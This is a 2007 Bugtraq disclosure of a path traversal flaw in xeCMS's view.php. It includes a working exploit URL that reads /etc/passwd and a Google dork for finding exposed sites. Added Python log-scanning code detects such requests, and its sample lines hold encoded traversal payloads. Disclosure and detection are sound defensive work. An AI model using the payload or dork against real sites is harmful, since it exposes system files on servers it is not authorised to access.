xeCMS 1.x.x Remote File Disclosure Vulnerability.
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: xeCMS 1.x.x Remote File Disclosure Vulnerability.
- From: p4imi0 <p4imi0@xxxxxxxxx>
- Date: Wed, 19 Dec 2007 22:47:55 +0100
--------------------------------------------------------------
xeCMS 1.x.x Remote File Disclosure Vulnerability.
--------------------------------------------------------------
download : http://xecms.sunsite.dk/
author : p4imi0
contact : p4imi0@xxxxxxxxx
exploit : view.php?list=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
google dork : inurl:"view.php?list=" Powered by xeCMS
thanks to : str0ke, Cr[]w.
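
The request pattern reported above can be hunted for in web server access logs. The following is an added example, not part of the original advisory or of xeCMS: it flags requests to view.php whose list parameter decodes to a path containing a ".." segment, including double-encoded and backslash forms. The Common Log Format input, the sample lines and all function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (Common Log Format), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Dec/2007:10:01:02 +0100] "GET /view.php?list=news HTTP/1.1" 200 5120',
    '192.0.2.44 - - [20/Dec/2007:10:03:17 +0100] "GET /view.php?list=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1843',
    '192.0.2.44 - - [20/Dec/2007:10:03:19 +0100] "GET /cms/view.php?list=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1843',
    '192.0.2.51 - - [20/Dec/2007:10:05:40 +0100] "GET /view.php?list=..%5C..%5Cboot.ini HTTP/1.1" 404 312',
    '192.0.2.60 - - [20/Dec/2007:10:06:00 +0100] "GET /index.php?page=..%2Fabout HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so double-encoded input (%252e) is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(value):
    """True if the decoded value has a '..' path segment or is an absolute path."""
    path = fully_decode(value).replace("\\", "/")
    return path.startswith("/") or ".." in path.split("/")

def find_traversal_requests(lines):
    """Return (client, status, decoded list value) for suspicious view.php hits."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/view.php"):
            continue
        # parse_qsl decodes once; fully_decode handles any further layers.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name == "list" and is_traversal(value):
                hits.append((line.split()[0], int(m.group(2)), fully_decode(value)))
    return hits

if __name__ == "__main__":
    for client, status, value in find_traversal_requests(SAMPLE_LOG):
        print(f"{client} status={status} list={value!r}")
```

Hits answered with status 200 are the ones to triage first, since they suggest the server returned content for the traversed path.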